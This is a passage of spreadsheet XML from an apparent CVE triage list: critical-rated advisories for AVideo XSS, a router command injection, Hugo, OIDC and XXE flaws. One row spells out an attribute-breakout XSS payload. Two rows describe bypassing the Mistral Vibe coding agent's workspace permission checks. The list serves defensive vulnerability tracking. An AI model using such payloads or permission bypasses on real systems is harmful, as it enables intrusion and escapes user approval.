          <t>An arbitrary file write vulnerability in Mistral Vibe, introduced in version 1.3.4, allows an attacker to create or overwrite files outside the active workspace without user approval. Shell redirection destinations are omitted from permission checks, enabling otherwise allowlisted commands to write to arbitrary paths accessible to the Vibe process.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87984</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89010</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>WAVLINK WN535M1 and WN535M3 routers running firmware prior to M35M1_V250922 contain an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary commands as root by sending crafted filenames to the sync_server daemon on TCP port 13136. The daemon interpolates attacker-controlled filename input containing shell metacharacters into a shell command string via sprintf() and passes it to system() without sanitization, enabling root-level command execution on the device.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89010</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89249</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the YPTWallet plugin where user-supplied CryptoWallet values are base64-encoded but not HTML-escaped before storage in wallet_log.information. Administrators viewing pending withdrawal requests in pendingRequests.php execute the stored markup in their session, allowing attackers to perform administrative actions via same-origin fetch requests.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89249</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89253</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the user 'donationLink' profile field. User::setDonationLink() (objects/user.php) stores the value and save() validates it only with filter_var(..., FILTER_VALIDATE_URL), which accepts strings such as http://evil.example/"onmouseover=alert(document.domain)//, while getDonationLink() applies only strip_tags() and does not encode double quotes. plugin/CustomizeUser/actionButton.php echoes the value unencoded into an &lt;a href="..."&gt; attribute, and that button is included from view/modeYoutubeBottom.php on the watch page when the CustomizeUser option allowDonationLink is enabled. An authenticated user who updates their own profile via objects/userUpdate.json.php can therefore break out of the href attribute and inject an event handler that executes JavaScript in the browser of any visitor—including an administrator—who views the attacker's videos and interacts with (for example, hovers over) the donation button. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89253</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89254</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the CustomizeUser plugin where the field_name parameter is stored raw without sanitization. Administrators can inject malicious scripts via the add.json.php endpoint that execute when viewing extra info pages or profile forms that render the typeToHTML function.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89254</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89255</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LoginControl plugin that fails to HTML-encode PGP public keys echoed into a textarea element. An authenticated attacker can inject malicious JavaScript by submitting a crafted public key, which executes in an administrator's session when viewing the user's profile tab.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89255</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89256</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the Bookmark plugin where chapter names are not encoded before being concatenated into public watch-page HTML. A video owner can inject malicious scripts via the bookmark name parameter, and every visitor of that video executes the payload in the AVideo origin.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89256</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89258</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. In versions after v0.123.0 and before v0.165.0, symlinks in parent directories were not dropped during direct resource lookups, allowing path confinement to be bypassed. An attacker who can place — or who convinces a site author to place — a symlink inside a mounted directory (for example, in a locally vendored theme under themes/) can cause functions that perform direct lookups, such as resources.Get and os.ReadFile, to follow that symlink and read files outside the intended project boundaries, disclosing their contents in the built site. Themes mounted as Go modules fetched from GitHub have symlinks stripped on download and are not affected, and multi-directory walks (e.g. content/asset walking) are not affected. This issue is an incomplete-fix follow-up to GHSA-c3wq-j5vh-68rc and GHSA-fw87-fv5r-9fpw; it is fixed in v0.165.0.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89258</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89259</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. From v0.161.0, Hugo executes Node tools under Node's permission model, but TailwindCSS — included in the default security.exec.allow list — requires a highly permissive configuration (--allow-addons, --allow-child-process, --allow-worker). As a result, the restrictions intended by the fix for GHSA-x597-9fr4-5857 could still be bypassed, allowing a Node tool invoked during a build to read and write files outside the project's working directory. Affected versions are those after v0.43; the issue was fixed in v0.165.0 by removing tailwindcss from the default security.exec.allow list. Users who do not use TailwindCSS, or who only build trusted sites, are not affected. As a workaround, users can define a restrictive security.exec.allow list in hugo.toml.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89259</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89448</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Force requesting ACS when tboot is enabled
Currently the conditions of requesting ACS in detect_intel_iommu()
don't include tboot, leading to a possible misconfiguration with ACS
disabled (e.g. due to user opts) while iommu is later forced on by
tboot_force_iommu().
Fix it by checking tboot in detect_intel_iommu().</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89448</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3869</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-303 : Incorrect Implementation of Authentication Algorithm vulnerability exists that could cause loss of confidentiality, integrity and availability of the PLC provided an application project with a lower application level is running on the PLC.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3869</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47839</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security@vmware.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allows users authenticating through a federated OIDC provider to obtain the uaa.admin scope despite operators restricting that provider through externalGroupsWhitelist configuration. The issue occurs specifically when an OIDC identity provider uses groupMappingMode: AS_SCOPES with a wildcard externalGroupsWhitelist entry.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47839</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54047</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-349, CWE-602</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>Laci Synchroni is a decentralized mod and appearance sync server and plugin for Dalamud. Versions of the backend prior to 1.2.3 have an improper authentication vulnerability in the application's OAuth2 login flow. The application relies on client-side state by trusting the `UID` field inside the `Authentications` object of a user's local `config.json` file. By manually editing this local file on their PC prior to logging in, a user can supply an arbitrary UID. Because the server fails to validate that the authenticated OAuth2 identity matches the requested UID, an attacker can fully impersonate any target user and perform actions on their behalf. This issue has been resolved in version 1.2.3. The patch modifies `AuthorizeOauthAsync` inside the `SecretKeyAuthenticatorService` to strictly bind the lookup of the requested User ID (`requestedUid`) to the record of the successfully authenticated identity (`primaryUid`). The server will no longer load or return session tokens for a requested UID unless it matches the verified, authenticated database record. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54047</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87983</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file read vulnerability in Mistral Vibe, introduced in version 2.6.0, allows an attacker to bypass workspace restrictions using quoted absolute paths in allowlisted shell commands. Improper handling of quotation marks during path validation enables files outside the active workspace to be read without user approval.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87983</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89212</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>A flaw resulting in XML external entity (XXE) was found in Akana API Platform in which references were improperly restricted during XML-to-JSON processing. The issue affects Akana versions 2026.1, 2025.1.1, and all versions before 2024.1.6 (including older unsupported versions of Akana) and has been fixed as a security patch in the latest release of supported versions.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89212</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89243</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in UserGroups::setGroup_name() that fails to sanitize group_name input. Administrators with canAdminUserGroups permission can inject malicious HTML and JavaScript that executes in the browser when other administrators access the user manager interface.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89243</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90456</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
